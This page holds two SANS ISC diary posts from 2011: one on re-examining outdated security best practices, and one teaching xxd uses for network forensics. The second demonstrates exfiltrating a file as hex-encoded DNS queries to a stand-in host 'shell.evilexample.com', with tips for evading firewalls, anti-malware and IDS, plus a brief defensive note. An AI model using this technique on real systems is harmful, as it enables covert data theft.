Reviewing our preconceptions

Published: 2011-01-25
Last Updated: 2011-01-25 14:01:20 UTC
by Chris Mohan (Version: 1)
6 comment(s)

One of the challenges faced in the IT industry is to break poorly conceived or mistaken preconceptions held by others. What happens when we’re the ones holding on to out dated ideas or are just wrong, as technology has taken another huge leap forward and we’re left standing clutching on to something that’s now infective?

I have been reviewing some documentation I wrote three years ago and at a glance it appeared to be valid, using correct assumptions and only needing minor tweaks to bring it up to date.

John, an ISC reader, emailed in a great comment from a discussion about best practices he was involved in re-enforcing this. Smart people in that room brought out timeless best practice statements such as:
'Logs should be stored separate from the application to prevent out of control logs from filling up the system and causing other components to crash.'

All of which makes perfect sense from a best practice point of view, and I follow this principle for many of the systems I install and manage. Let’s attempt to see if this best practice statement is still valid by asking some simple questions:

  • Why are we creating logs in the first place?
  • Who looks at them?
  • Do the right people have access to the logs?
  • Are they of any use?
  • Is there any need to archive them or can they be deleted after x amount of time?
  • Are we asking the right people about the logs in the first place?

It may come out that having 300 GB of logs, that are on their own fast RAID-ed disks and are backed up nightly is a huge waste of time, money and resources, as no-one every looks, uses or know what to do with them. Having only a week’s worth of logs, taking up 10MB of disk, used only for possible troubleshooting might be the best solution.

So going back to my documentation, I took a hard look at what I’d written. Almost immediately I found I’d fallen in to the generic best practice assumptions pit. They were good at the time, but not now, given the way the business, processes and technology had changed. Needless to say the quick document update stretched in to a number of hours of re-writes, only after talking to various people on a string of questions I need to address. Once the documents had been peer reviewed, signed off and finally upload, I added an entry in to my diary to take time to review and, if necessary, amend these documents six months from now.

Do you apply a review process to security policies, procedures, documents and best practices to ensure they still meet the measures and metrics that make them still relevant, meaningful and fit current business needs?

How do can you ensure that you’re not clinging to best practices or policies that are well past their sell by date?

Can you share any pearls of wisdom to help others avoid automatic adoptions of reasonable sounding, yet poorly thought out, best practices?

 

Chris Mohan --- ISC Handler on Duty

6 comment(s)

Packet Tricks with xxd

Published: 2011-01-25
Last Updated: 2011-01-25 13:35:30 UTC
by Johannes Ullrich (Version: 1)
3 comment(s)

I just got done teaching For 558, our relatively new Network Forensics class. Great students and some great side discussions. One of this side discussions involved 'xxd', a tool that can be used to create a hex dump from a binary file or reverse a hex dump back into a binary file. For example:

xxd index.html | head -1
0000000: 3c21 444f 4354 5950 4520 6874 6d6c 200a  <!DOCTYPE html .

 The tool is even flexible enough to be used in vi (try: vi -b with %!xxd or %!xxd -r to "undo" it before saving)

The tool is very handy, two uses that came up in class:

1. Stripping headers and extracting data from a covert channel.

One method to establish a covert channel is to take the original packet, and wrap it into an encapsulating header. For example an ICMP or a DNS packet. The trick is to extract the payload, save it in a new file, and treat it as a new packet capture. The 'packetstan' blog [1] outlines one way to do so via scapy. But scapy is not as commonly installed and available as other tools like for example tshark (and well, xxd).

tshark can easily be used to extract the payload in hexadecimal format:

tshark -T fields -e data

to convert the hexadecimal payload into a binary files, just run it through xxd:

tshark -T fields -e data | xxd -r -p

The "-p" option will just accept a stream of hexadecimal data, without it, xxd expects it to be encoded in the very specific format usually see with xxd.

2. File transfer via DNS

Another nice idea I demoed in class is a file transfer via DNS that works without special tools. For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.

This idea is along the lines of what is discussed in Kevin Bong's SANS Master's project [2].

First, we convert the file to be transferred via xxd into a hex stream.

xxd -p secret > file.hex

next, we read each line from file.hex, and "transmit" it as a DNS query.

for b in `cat file.hex `; do dig $b.shell.evilexample.com; done

This does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log.

tcdpump -w /tmp/dns -s0 port 53 and host system.example.com

Then, we extract the messages from the packet capture

 tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt

The "uniq" may not be necessary, but I find that the DNS messages may be resend once in a while if the response isn't fast enough.

Finally, just reverse the hex encoding:

xxd -r -p < receivedu.txt > keys.pgp

And you are done! FTDNS (File Transfer via DNS) without installing any special tools on "system.example.com"

Bonus: shorter lines from xxd and maybe a quick xor may make it even harder for an IDS/Data Leakage system to "see" this kind of data.

Defense: Watch you DNS logs!

[1] http://www.packetstan.com/2010/11/packet-payloads-encryption-and-bacon.html
[2] http://sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

3 comment(s)

Comments


Diary Archives